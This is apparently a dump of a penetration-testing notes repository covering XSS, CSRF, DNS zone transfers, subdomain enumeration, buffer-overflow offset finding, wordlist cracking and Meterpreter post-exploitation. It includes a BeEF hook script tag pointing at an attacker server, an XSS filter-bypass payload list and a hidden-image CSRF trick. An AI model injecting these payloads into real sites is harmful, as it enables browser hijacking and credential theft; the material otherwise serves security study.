 20 | The attacker can insert a fake login. Image that you visit a site, and from that site you are able to login using your facebook or google-account. The attacker could spoof that so that when you enter your credentials, they are then sent to the attacker. 
 21 | 
 22 | 5. Browser exploits
 23 | The script can redirect to a another page that issues an attack against the browser, possibly leading to total takeover of the machine.
 24 | 
 25 | ### Types of XSS
 26 | 
 27 | 1. Persistent
 28 | This is when the malicious code originates from the websites database. That means the attacker has managed to insert malicious code into the database. So every time the database serve that data the script will me executed. this is probably the most dangerous XSS, since it does not need to rely on social engineering.
 29 | 
 30 | 2. Reflected
 31 | This is an attack where the script originates from the users request. This might seem a bit illogical, why would a user inject malicious code to himself? Well the code can 
 32 | 
 33 | 3. DOM based
 34 | DOM-based attacks are when something is injected into javascript on the DOM. So, it does not go by the server. Because the code gets executed in the response.
 35 | Take a search-functionality for example. The users enters a search-parameter that gets sent to the server which might sanitize it or something. In the response the found search-items are sent, but not the search-query. But on the webpage the search query is exposed. "You searched for X" is shown. That is because it gets the search parameter from the url-parameter. By using `document.location.href` for example.
 36 | 
 37 | ## Beef
 38 | 
 39 | Beef username/password: beef:beef
 40 | Beef is a great tool for attacking browsers. 
 41 | 
 42 | After starting it up you can log in to the panel. Then you get someone to execute the hook.
 43 | Hook URL: http://172.17.15.118:3000/hook.js
 44 | UI URL:   http://172.17.15.118:3000/ui/panel
 45 | 
 46 | By injecting the hook into a XSS. Like this
 47 | 
 48 | ```javascript
 49 | <script src="http://172.17.15.118:3000/hook.js"></script>
 50 | ```
 51 | 
 52 | 
 53 | ### How does it really work?
 54 | Let's look at a practical example.
 55 | 
 56 | 
 57 | ### Protect yourself
 58 | 
 59 | The problem with XSS is that it is a bit hard for the users to protect themselves. If there is a problem witht the website there is not that much the user can do.
 60 | 
 61 | One can always use noscript to block all javascript code. But that pretty much destroys the whole experience with using the internet.
 62 | 
 63 | ### Protect your website
 64 | 
 65 | There are mainly two ways to protect against ** encoding ** and ** sanitizing **.
 66 | 
 67 | #### Encoding
 68 | 
 69 | 
 70 | Of course the way to protect your website is to sanitize all input. 
 71 | 
 72 | You can also set the response-header like this:
 73 | `-xss-protection:"1; mode=block"`
 74 | 
 75 | For nodeJs you can use the helmet-module to do this.
 76 | https://www.npmjs.com/package/helmet
 77 | 
 78 | 
 79 | ### Risks for the attacker
 80 | The obvious risk is that the attacker must expose a server. 
 81 | 
 82 | ### Tools
 83 | 
 84 | #### XSSER
 85 | 
 86 | This tool tests a lot of 
 87 | 
 88 | `xsser --gtk`
 89 | 
 90 | 
 91 | #### Xssposed
 92 | This is a tool found in recon-ng. It basically just check this (https://www.openbugbounty.org/
 93 | ) database to see if anyone has reported a xss for the website.
 94 | 
 95 | 
 96 | 
 97 | 
 98 | 
 99 | ###References:
100 | 
101 | http://brutelogic.com.br/blog/probing-to-find-xss/
102 | http://excess-xss.com/
103 | 
104 | 


--------------------------------------------------------------------------------
/cross_site_request_forgery.md:
--------------------------------------------------------------------------------
 1 | # Cross Site Request Forgery
 2 | 
 3 | Cross site Request Forgery (CSRF) attacks forces the user to perform action the he did not intend to perform. This usually (only?) possible by creating a malicious URL-address that the victim executes in his browser, while he is logged in.
 4 | 
 5 | ## What's the worst that can happen?
 6 | 
 7 | The attacker can make actions for the user. For example change the email-address, make a purchase, or something like that. So it could be used to change the adress, and reset the password by sending an email.
 8 | 
 9 | 
10 | ## How to perform it?
11 | 
12 | 1. Investigate how the website works
13 | First you need to know how the application works. What the endpoints are.
14 | 
15 | 2. Construct your malicious URL
16 | Now you just construct the URL. Either using get or post.
17 | 
18 | - `GET`
19 | If you use only `GET` you can construct the URL like this:
20 | 
21 | http://example.com/api/createUser?name=Jose
22 | 
23 | - `POST`
24 | 
25 | If the requests are sent as `POST` you need to make the victim run a link that where you control the server. So that you can add the arguments in the body.
26 | 
27 | There is one creat trick for this. It is to use the image-tag. Because the image-tag can be used to automatically retrieve information from other sites. If you have an image on your site but it is referenced to
28 | 
29 | `<img style="display: none" src="http://example.com/image.jpg">`
30 | 
31 | 
32 | ## Protection
33 | 
34 | The only real solution is to use unique tokens for each request.
35 | 
36 | 
37 | 
38 | ### References
39 | 
40 | 
41 | http://tipstrickshack.blogspot.cl/2012/10/how-to-exploit-csfr-vulnerabilitycsrf.html
42 | 
43 | https://www.owasp.org/index.php/Testing_for_CSRF_(OTG-SESS-005)
44 | 
45 | https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)


--------------------------------------------------------------------------------
/dGaQO6Y.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/dGaQO6Y.png


--------------------------------------------------------------------------------
/database.md:
--------------------------------------------------------------------------------
 1 | # Database
 2 | 
 3 | Working with the database that is connected to metasploit is great.
 4 | 
 5 | 
 6 | ```
 7 | workspace
 8 | workspace -a nameOfNewWorkspace #Add
 9 | workspace -d nameOfNewWorkspace #Delete
10 | ```
11 | 
12 | 
13 | ```
14 | hosts
15 | ```
16 | 
17 | ```
18 | services
19 | ```


--------------------------------------------------------------------------------
/default_layout_apache_on_different_versiont.md:
--------------------------------------------------------------------------------
1 | # Default Layout of Apache on Different Versions
2 | 
3 | 
4 | Really useful if you want to know what the root-folder is for an apache install:
5 | 
6 | https://wiki.apache.org/httpd/DistrosDefaultLayout#Debian.2C_Ubuntu_.28Apache_httpd_2.x.29:


--------------------------------------------------------------------------------
/dictionary_attacks.md:
--------------------------------------------------------------------------------
1 | # Dictionary Attacks
2 | 
3 | ## Burp suite
4 | Intercept the login request
5 | Rightclick - Send to intruder
6 | 


--------------------------------------------------------------------------------
/directory-traversal-attack.md:
--------------------------------------------------------------------------------
1 | ## Directory Traversal Attack
2 | 
3 | When the attacker is able to read files on the filesystem.
4 | 
5 | Differ from LFI in the aspect that LFI can execute code, while a Directory Traversal Attack cannot.
6 | 
7 | 


--------------------------------------------------------------------------------
/dns-spoofing.md:
--------------------------------------------------------------------------------
1 | # DNS-spoofing
2 | 
3 | This attack can also me called DNS cache posining.
4 | This attack is also performed on a already compromised network. It is pretty much like Arp-spoofing. But instead of relying traffic we are directing the user to visit a fake web-site that we have set up.
5 | 
6 | We set up a webpage that is a clone of facebook.com. We intercept the dns-traffic, and everytime the target sends a request to a dns-server to resolve facebook.com we intercept that request and directs the user to our clone.


--------------------------------------------------------------------------------
/dns_basics.md:
--------------------------------------------------------------------------------
 1 | # DNS Basics
 2 | 
 3 | 
 4 | This is the best article I have found about how the DNS-system works. Form the highest to the lowest level.
 5 | 
 6 | [An introduction to dns-terminology components and concepts](https://www.digitalocean.com/community/tutorials/an-introduction-to-dns-terminology-components-and-concepts)
 7 | 
 8 | Before we begin to look at the specific techniques that exists to find subdomains, lets try to understand what subdomains are and how they work.
 9 | 
10 | ** A - records **
11 | 
12 | A stands for **address**.
13 | 
14 | The A record maps a name to one or more IP addresses, when the IP are known and stable.
15 | So that would be 123.244.223.222 => example.com
16 | 
17 | **AAAA** - points to a IPv6 Record 
18 | 
19 | ** CNAME **
20 | 
21 | The CNAME record connects a name to another name. An example of that would be:
22 | 
23 | ```
24 | www.example.com,CNAME,www.example.com.cdn.cloudflare.net.
25 | ```
26 | 
27 | Another example is. If you have the domains mail.example.com and webmail.example.com. You can have webmail.example.com point to mail.example.com. So anyone visiting webmail.example.com will see the same thing as mail.example.com. It will NOT redirect you. Just show you the same content.
28 | 
29 | Another typical usage of CNAME is to link www.example.com to example.com
30 | 
31 | CNAME is quite convenient. Because if you change the A-record. The IP-address, you don't need to change the other subdomains, like ftp.example.com or www.example.com. Since they both point to example.com, which is a A-record and points directly to the IP.
32 | 
33 | Another note.
34 | If foo.example.com points to bar.example.com, that mean that bar.example.com is the CNAME (Canonical/real/actual Name) of foo.example.com.
35 | 
36 | 
37 | 
38 | ** Alias **
39 | 
40 | Kind of like CNAME in that it points to another name, not an IP.
41 | 
42 | ** MX - Mail exchange **
43 | 
44 | https://en.wikipedia.org/wiki/MX_record
45 | 


--------------------------------------------------------------------------------
/dns_zone_transfer_attack.md:
--------------------------------------------------------------------------------
 1 | # DNS Zone Transfer Attack
 2 | 
 3 | Sometimes DNS servers are misconfigured. The DNS server contains a Zone file which it uses to replicate the map of a domain. They should be configured so that only the replicating DNS-server can access it, but sometimes it is misconfigured so anyone can request the zone file, and thereby recieve the whole list of subdomains. This can be done the following way:
 4 | 
 5 | 
 6 | To do this we first need to figure out which DNS-servers a domain has.
 7 | 
 8 | ```
 9 | host -t ns wikipedia.com
10 | ```
11 | 
12 | ```
13 | host -l wikipedia.com ns1.wikipedia.com
14 | ```
15 | 
16 | This can also be done with tools such as dnsrecon and dnsenum.
17 | 
18 | https://security.stackexchange.com/questions/10452/dns-zone-transfer-attack


--------------------------------------------------------------------------------
/dom-based-xss.md:
--------------------------------------------------------------------------------
 1 | ## DOM-based XSS
 2 | 
 3 | In DOM-based XSS the malicious code is never sent to the server. The injection-point is somewhere where javascript has access.
 4 | 
 5 | The typical example of how this works is with URLs.
 6 | 
 7 | The user is able to control the URL with the help of the hash-symbol `#`. If we add that symbol to a URL the browser will not include that characters that comes after it in the requet to the server.
 8 | 
 9 | ```
10 | https://example.com/#this_is_not_sent_to_server
11 | ```
12 | 
13 | However, the complete URL is included in DOM-objects.
14 | 
15 | ```
16 | document.URL
17 | # will generate this output: https://example.com/#this_is_not_sent_to_server
18 | ```
19 | 
20 | ### Source
21 | 
22 | So in order to inject and execute a DOM-based XSS we need a injection-point \(called source\) and a point of execution \(called sink\).
23 | 
24 | In the example above `document.URL` is our source. Example of other sources are:
25 | 
26 | ```
27 |     document.URL
28 |     document.documentURI
29 |     document.URLUnencoded (IE 5.5 or later Only)
30 |     document.baseURI
31 |     location
32 |     location.href
33 |     location.search
34 |     location.hash
35 |     location.pathname
36 | 
37 |     window.name
38 |     document.referrer
39 | ```
40 | 
41 | ### Sinks
42 | 
43 | ```
44 | eval    
45 | setTimeout      
46 | setInterval     
47 | setImmediate    
48 | execScript      
49 | crypto.generateCRMFRequest      
50 | ScriptElement.src       
51 | ScriptElement.text      
52 | ScriptElement.textContent       
53 | ScriptElement.innerText         
54 | anyTag.onEventName
55 | ```
56 | 
57 | 
58 | 
59 | ### Finding it
60 | 
61 | To find DOM-based XSS you will need to check out the code.
62 | 
63 | 
64 | 
65 | If the javascript code is bundled and minified you can use js\_beautify to make it readble again.
66 | 
67 | 
68 | 
69 | ```
70 |  sudo apt-get install libjavascript-beautifier-perl
71 |  # then invoke js_beautify
72 | ```
73 | 
74 | 
75 | 
76 | 
77 | 
78 | ## References
79 | 
80 | [https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources](https://github.com/wisec/domxsswiki/wiki/location,-documentURI-and-URL-sources)
81 | 
82 | 


--------------------------------------------------------------------------------
/editing-exploits.md:
--------------------------------------------------------------------------------
1 | # Editing exploits
2 | 
3 | We often find exploits that do not work out of the box. Typical problems we encounter are:
4 | - Payload needs to be changed
5 | - Return-address is incorrect
6 | 
7 | 


--------------------------------------------------------------------------------
/email_harvesting.md:
--------------------------------------------------------------------------------
 1 | # Identifying People
 2 | 
 3 | We want to find out how is connected to the target. That can be site administrator, employees, owner, mods. Maybe one of the administrators have posted in a forum with their email, or in a newsgroup or somewhere else. Those posts could contain useful data about the stack or help us devlop a network diagram. We might also need to use social engineering.
 4 | 
 5 | In order to find people we might use the following sources:
 6 | 
 7 | * The company website
 8 | * Social media \(LinkedIn, Facebook, Twitter etc\)
 9 | * Forums and newsgroups
10 | * Metadata from documents
11 | 
12 | ### Company Website
13 | 
14 | This is pretty obvious. Just look around on the website. Or download it. Or spider it with burp and then search the result.
15 | 
16 | Make sure to check out the blog. There you might have employees writing blogposts under their name.
17 | 
18 | ### Social Media
19 | 
20 | ```
21 | site:twitter.com companyname
22 | site:linkedin.com companyname
23 | site:facebook.com companyname
24 | ```
25 | 
26 | ### Metadata From Documents
27 | 
28 | You find some documents and then run exiftool on them to see if there is any interesting metadata.
29 | 
30 | ```
31 | site:example.com filetype:pdf
32 | ```
33 | 
34 | ## Email Harvesting
35 | 
36 | theharvester - I have not had luck with this
37 | 
38 | ```
39 | theharvester -d example.com -l 500 -b all
40 | ```
41 | 
42 | ## Check if emails have been pwned before
43 | 
44 | [https://haveibeenpwned.com](https://haveibeenpwned.com)
45 | 
46 | # Users
47 | 
48 | social-searcher.com
49 | 
50 | Reddit  
51 | Snoopsnoo
52 | 
53 | 


--------------------------------------------------------------------------------
/escaping_restricted_shell.md:
--------------------------------------------------------------------------------
 1 | # Escaping Restricted Shell
 2 | 
 3 | Some sysadmins don't want their users to have access to all commands. So they get a restriced shell. If the hacker get access to a user with a restriced shell we need to be able to break out of that, escape it, in order to have more power.
 4 | 
 5 | Many linux distros include rshell, which is a restriced shell.
 6 | 
 7 | To access the restried shell you can do this:
 8 | 
 9 | ```
10 | sh -r 
11 | rsh
12 | 
13 | rbash
14 | bash -r
15 | bash --restricted
16 | 
17 | rksh
18 | ksh -r
19 | ```
20 | 
21 | http://securebean.blogspot.cl/2014/05/escaping-restricted-shell_3.html?view=sidebar
22 | http://pen-testing.sans.org/blog/pen-testing/2012/06/06/escaping-restricted-linux-shells


--------------------------------------------------------------------------------
/example_of_company_architecture.md:
--------------------------------------------------------------------------------
1 | # Example of company architecture
2 | 
3 | https://www.reddit.com/r/AskNetsec/comments/4p7onl/gaining_initial_access_in_realworld_pentesting/
4 | 
5 | ![Map](dGaQO6Y.png)


--------------------------------------------------------------------------------
/examplesXSS.md:
--------------------------------------------------------------------------------
 1 | # Examples
 2 | 
 3 | This is a good list:
 4 | 
 5 | https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester
 6 | 
 7 | ## No security
 8 | `<script>alert(1)</script>`
 9 | 
10 | 
11 | Imagine that the server sanitizes `<script>`. To bypass that we can use:
12 | `<SCrIpt>alert(2)</ScRiPt>`
13 | `<script type=text/javascript>alert(2)</script>`
14 | 
15 | ### Using the IMG-tag
16 | ```
17 | <IMG SRC="javascript:alert('XSS');">
18 | <IMG SRC=javascript:alert('XSS')>
19 | <IMG SRC=JaVaScRiPt:alert('XSS')>
20 | <IMG SRC=javascript:alert("XSS")>
21 | <IMG onmouseover="alert('xxs')">
22 | ```
23 | 
24 | 
25 | ### Onmouseover
26 | ```
27 | <a onmouseover="alert(2)">d</a>
28 | ```
29 | 


--------------------------------------------------------------------------------
/exploit-examples_2.md:
--------------------------------------------------------------------------------
 1 | # Exploit-examples 2
 2 |  
 3 | 
 4 | So whole sections continues to be a chaos. So instead of repairing the broken chapters I am just going to start writing a new, and see if I can have it make more sense this time.
 5 | 
 6 | You have an application that you know is vulnerable to a buffer overflow. These are the steps to exploit it:
 7 | 
 8 | - Find the buffer overflow
 9 | - Find exact offset
10 | - Identify bad characters
11 | 
12 | 
13 | ## Find the buffer overflow
14 | 
15 | First we need to find where it is. We can do that by progressivly add more bytes and then attach the process to a debugger (immunity, olly). Then we just probe the application with more and more bytes until we reach the limit where the application crashes.
16 | 
17 | ## Find exact offset
18 | 
19 | Now we need to know exactly where the offset is. We can do that using some metasploit tools. We create a fuzzing payload lke this
20 | 
21 | 
22 | ```
23 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 700
24 | ```
25 | 
26 | This will return something like this:
27 | 
28 | ```
29 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A...
30 | ```
31 | 
32 | So we modify our exploit-script and add the fuzzer-payload as our payload. We run it again and look for where it crashes in out debugger.
33 | 
34 | We take that hex and check with another metasploit tool to know the exact offset. Like this
35 | 
36 | ```
37 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 -l 700
38 | # Stdout
39 | [*] Exact match at offset 605
40 | ```
41 | 
42 | So now we know the exact offset. This means that we know where we have the EIP. We can now modify our exploit-script to place a uniq string in the EIP to make sure everything is working as expected.
43 | 
44 | ## Identify bad characters
45 | 
46 | Now it is time to start developing our malicious payload. But before we do that we need to know what bad characters we have, so we can avoid them. We can do that by sending all characters to the buffer and see how the application reacts to it.
47 | 
48 | Here are all characters, from **x01** to **xff**. If the application removes it or something like that we know it is a bad character. 
49 | 
50 | ```
51 | \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1 \xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4 \xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7 \xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff
52 | ```
53 | 
54 | Common bad characters are
55 | **x00** - Null byte
56 | **x0a** - New line
57 | **x0d** - Carriege return
58 | 
59 | 4. 


--------------------------------------------------------------------------------
/exploiting.md:
--------------------------------------------------------------------------------
 1 | # Exploiting
 2 | 
 3 | So you have done your homework, and done your vulnerability analysis and found several vulnerabilities. Now it is time to exploit them.
 4 | 
 5 | Before you start writing your own exploits you should of course check if there are some already written.
 6 | 
 7 | Do not just grab any exploit on the internetz. If it contains shellcode it might be you that is getting hacked. On Exploit-db and Security focus they vet the exploits before they are published so it is at least a bit more secure. But be paranoid, and don't trust shellcode or code that you didn't write. 
 8 | 
 9 | [Exploit-DB](https://www.exploit-db.com)
10 | [Security Focus](http://www.securityfocus.com/)
11 | 


--------------------------------------------------------------------------------
/exploits.md:
--------------------------------------------------------------------------------
 1 | # Exploits
 2 | 
 3 | Once you have chosen an exploit you can make sure that the exploit is targeting by writing
 4 | 
 5 | ```
 6 | show targets
 7 | ```
 8 | 
 9 | Show compatible payloads
10 | ```
11 | show payloads
12 | ```
13 | 
14 | ```
15 | show options
16 | ```
17 | 
18 | ```
19 | show advanced
20 | ```
21 | 
22 | 
23 | ```
24 | show evasion
25 | ```
26 | 
27 | 


--------------------------------------------------------------------------------
/exposed_version_control.md:
--------------------------------------------------------------------------------
 1 | # Exposed Version Control
 2 | 
 3 | If you, using dirb or nikto, find version control file exposed, you can use it like this.
 4 | 
 5 | ```
 6 | git clone http://example.com/.git
 7 | ```
 8 | 
 9 | https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/
10 | 


--------------------------------------------------------------------------------
/failure-to-restrict-url-access.md:
--------------------------------------------------------------------------------
 1 | ## Failure to Restrict URL Access
 2 | 
 3 | 
 4 | 
 5 | This basically means that a normal user has access to areas on a webpage that should only be accessible to an administrator, or another user. This can happen when the website hides functionality from its users, instead of restricting it with authentication. So if the user finds out the hidden URL the user will be able to access that part of the website.
 6 | 
 7 | 
 8 | 
 9 | ### 
10 | 
11 | ### How to exploit it
12 | 
13 | It kind of depends on what access you have to the service. If you have access to an installation you can just create a list of all URLs that the admin-account, or low-privilege accounts have access too. And then check if a non-authenticated users can access those pages.
14 | 
15 | If you are testing it black-box style you can force browse it.
16 | 
17 | 
18 | 
19 | ### References
20 | 
21 | 
22 | 
23 | https://www.owasp.org/index.php/Top\_10\_2010-A8-Failure\_to\_Restrict\_URL\_Access
24 | 
25 | 
26 | 
27 | 
28 | 
29 | 
30 | 
31 | 


--------------------------------------------------------------------------------
/find_subdomains.md:
--------------------------------------------------------------------------------
1 | # Find Subdomains
2 | 
3 | 
4 | Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means bigger possibility of success.
5 | 
6 | For now this seems to be a very comprehensive list of tools to find subdomains.
7 | https://blog.bugcrowd.com/discovering-subdomains
8 | 
9 | 


--------------------------------------------------------------------------------
/finding_subdomains.md:
--------------------------------------------------------------------------------
  1 | # Find Subdomains
  2 | 
  3 | 
  4 | Finding subdomains is fundamental. The more subdomains you find, the bigger attack surface you have. Which means bigger possibility of success.
  5 | 
  6 | For now this seems to be a very comprehensive list of tools to find subdomains.
  7 | https://blog.bugcrowd.com/discovering-subdomains
  8 | 
  9 | Some tools find some stuff, other tools other stuff. So your best bet is to use a few of them together. Don't forget to brute-force recursively!
 10 | 
 11 | 
 12 | ### recon-ng
 13 | 
 14 | In order to find subdomains we can use the recon-ng framework. It has the same basic structure as metasploit. You can learn more about this tool in the tools-section.
 15 | 
 16 | ```bash
 17 | recon-ng
 18 | 
 19 | use use recon/domains-hosts/
 20 | 
 21 | # This will give you a vast amount of alternatives.
 22 | 
 23 | show options
 24 | 
 25 | set source cnn.com
 26 | ```
 27 | 
 28 | 
 29 | All these subdomains will be saved in `hosts`, which you can access though: `show hosts`
 30 | 
 31 | If some of these subdomains are not given IPs automatically you can just run
 32 | 
 33 | ```
 34 | use recon/hosts-hosts/resolve
 35 | run
 36 | ```
 37 | 
 38 | And it will resolve all the hosts in the hosts-file. 
 39 | 
 40 | 
 41 | ### Google Dorks
 42 | 
 43 | Using google we can also find subdomains.
 44 | 
 45 | This will only give us the subdomains of a site.
 46 | 
 47 | `site:msn.com -site:www.msn.com`
 48 | 
 49 | `site:*.nextcloud.com`
 50 | 
 51 | To exclude a specific subdomain you can do this:
 52 | 
 53 | `site:*.nextcloud.com -site:help.nextcloud.com`
 54 | 
 55 | ### subbrute.py
 56 | 
 57 | The basic command is like this
 58 | 
 59 | `./subbrute.py -p cnn.com`
 60 | 
 61 | https://github.com/TheRook/subbrute
 62 | 
 63 | ### Knock
 64 | 
 65 | I haven't tested this yet.
 66 | https://github.com/guelfoweb/knock
 67 | 
 68 | 
 69 | ### Being smart
 70 | 
 71 | You also have to look at what kind of system the target has. Some web-apps give their clients their own subdomains. Like github.
 72 | 
 73 | Check out the homepage
 74 | Often companies brag about their clients. You can use this to guess the subdomains of some clients.
 75 | 
 76 | 
 77 | ### Reverse DNS-lookup
 78 | 
 79 | If you manage to figure out the IP range that the target owns (see section about nmap below). You can see which machines are online. And then you can run a script to find out the domain-addresses of those machines. That way you might find something new.
 80 | 
 81 | The text-file onlyIps.txt is a textfile with one IP-address on each line.
 82 | 
 83 | ```
 84 | #!/bin/bash
 85 | 
 86 | while read p; do
 87 |   echo $p;
 88 |   host  $p
 89 | done <onlyIps.txt
 90 | ```
 91 | 
 92 | Here are some more tools that can do reverse lookup
 93 | http://www.cyberciti.biz/faq/how-to-test-or-check-reverse-dns/
 94 | 
 95 | 
 96 | ### Online tools
 97 | 
 98 | #### DNSDumpster
 99 | 
100 | https://dnsdumpster.com/
101 | 
102 | #### Pentest-tools
103 | 
104 | https://pentest-tools.com/information-gathering/find-subdomains-of-domain
105 | 
106 | #### Intodns
107 | 
108 | http://www.intodns.com/
109 | 
110 | #### DNSStuff
111 | 
112 | This tool doesn't enumerate subdomains per se. But it hands of a lot of information about domains.
113 | http://www.dnsstuff.com/
114 | 
115 | 
116 | ## Bypassing CloudFlare
117 | 
118 | https://www.ericzhang.me/resolve-cloudflare-ip-leakage/
119 | 
120 | 
121 | This tool can be used to find old IPs. It could mean that the 
122 | http://toolbar.netcraft.com/site_report?url=lyst.com
123 | 
124 | 
125 | 
126 | ### Brute force dictionaries
127 | 
128 | If you try to brute force the domains it is a good idea to have a good dictionary. That can be found here:
129 | 
130 | Bitquark
131 | https://github.com/bitquark/dnspop
132 | 
133 | SecList
134 | https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS
135 | 
136 | 
137 | ## References
138 | https://en.wikipedia.org/wiki/CNAME_record
139 | 


--------------------------------------------------------------------------------
/firewalls.md:
--------------------------------------------------------------------------------
 1 | # Firewalls
 2 | 
 3 | ## Terminology
 4 | 
 5 | Let's start with some terminology. We often hear the words **egress filtering** and **ingress** in connection to talk about firewalls and routers.
 6 | 
 7 | 
 8 | **Egress filtering**
 9 | 
10 | This basically means that we are filtering outgoing traffic. So egress filtering ensures that malicious, or just prohibited, traffic is not allowed to leave the network. Of course egress filtering then is the enemy of the hacker. 
11 | 
12 | 


--------------------------------------------------------------------------------
/fss.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/fss.jpg


--------------------------------------------------------------------------------
/function1-stackframe.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/function1-stackframe.png


--------------------------------------------------------------------------------
/function1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/function1.png


--------------------------------------------------------------------------------
/general_tips.md:
--------------------------------------------------------------------------------
 1 | # General tips
 2 | 
 3 | ## Disposable email
 4 | 
 5 | If you are signing up for a lot of accounts you can use a disposable email. You just enter the email account you want for that second, and then you can view it. But remember, so can everyone else.  
 6 | [https://www.mailinator.com](https://www.mailinator.com)
 7 | 
 8 | ## Base64 encode/decode
 9 | 
10 | ```python
11 | import base64
12 | 
13 | encoded = base64.b64encode("String to encode")
14 | print encoded
15 | 
16 | decoded = base64.b64decode("aGVqc2Fu")
17 | print decoded
18 | ```
19 | 
20 | ## Default passwords
21 | 
22 | [http://www.defaultpassword.com/](http://www.defaultpassword.com/)
23 | 
24 | ## Getting GUI on machine that does not have RDP or VNC
25 | 
26 | You can forward X over SSH.  
27 | [http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html](http://www.vanemery.com/Linux/XoverSSH/X-over-SSH2.html)
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/generate_custom_wordlist.md:
--------------------------------------------------------------------------------
 1 | # Generate custom wordlist
 2 | 
 3 | Cracking passwords is good to know.
 4 | 
 5 | If we are able to do a dictionary-attack against a service it is important that we use a good dictionary. We can use e generic one. But we can also generate a custom wordlist based on certain criteria. That is what we are going to do in this chapter.
 6 | 
 7 | Remember people often use their birth dates, address, street address, pets, family members, etc. 
 8 | 
 9 | ## Who is the target?
10 | 
11 | The target might be a specific company or person.
12 | 
13 | ## Password rules
14 | 
15 | The service you want to hack might have specific password rules. Must contain certain characters, must be of certain length etc. 
16 | 
17 | 
18 | ## Combine a small/semi-small dict with a custom
19 | 
20 | To combine two wordlists you can just do
21 | 
22 | ```
23 | cat wordlist.txt >> wordlist2.txt
24 | ```
25 | 
26 | ## Create a custom wordlist
27 | 
28 | 
29 | 
30 | **Html2dic - Build dictionary from html**
31 | 
32 | You can build a dictionary from a html-page.
33 | 
34 | ```
35 | curl http://example.com > example.txt
36 | ```
37 | 
38 | Then run:
39 | 
40 | ```
41 | html2dic example.txt
42 | ```
43 | 
44 | Then you should probably remove duplicates.
45 | 
46 | 
47 | **Cewl - Spider and build dictionary**
48 | 
49 | ```
50 | cewl -w createWordlist.txt https://www.example.com 
51 | ```
52 | 
53 | Add minimum password length:
54 | 
55 | ```
56 | cewl -w createWordlist.txt -m 6 https://www.example.com 
57 | ```
58 | 
59 | **Improve the custom wordlist**
60 | 
61 | As we all know few password are just simple words. Many use numbers and special characters. To improve our password list we can use john the ripper. We can input our own rules, or we can just use the standard john-the-ripper rules
62 | 
63 | ```
64 | john ---wordlist=wordlist.txt --rules --stdout > wordlist-modified.txt
65 | ```
66 | 
67 | 
68 | ## References
69 | 
70 | http://null-byte.wonderhowto.com/how-to/hack-like-pro-crack-passwords-part-4-creating-custom-wordlist-with-crunch-0156817/
71 | 


--------------------------------------------------------------------------------
/getting_meterpreter_shell.md:
--------------------------------------------------------------------------------
  1 | # Meterpreter shell for post-exploitation
  2 | 
  3 | By now you probably has some kind of shell to the target. If it is not a meterpreter shell you should probably try to turn the current shell into a meterpreter shell, since it gives you a lot of tools available really easy.
  4 | 
  5 | So just create a meterpreter-shell from msfvenom or something like that. Maybe a php-shell. Or whatever you have access to. Then you just fire that script and get your meterpreter shell. Check out the chapter Exploiting/Msfvenom for more about creating payloads.
  6 | 
  7 | 
  8 | ## Basics
  9 | 
 10 | List all commands
 11 | ```
 12 | help
 13 | ```
 14 | 
 15 | Get help about a specific command
 16 | ```
 17 | help upload
 18 | ```
 19 | 
 20 | ### Sessions
 21 | So first some basics. You can put the shell into a background job with the command `background`. This might be useful if you have several shells going at the same time. Or if you want to move to a specific directory to upload or download some files.
 22 | 
 23 | List background sessions
 24 | ```
 25 | background -l
 26 | ```
 27 | 
 28 | Connect back to a background session
 29 | ```
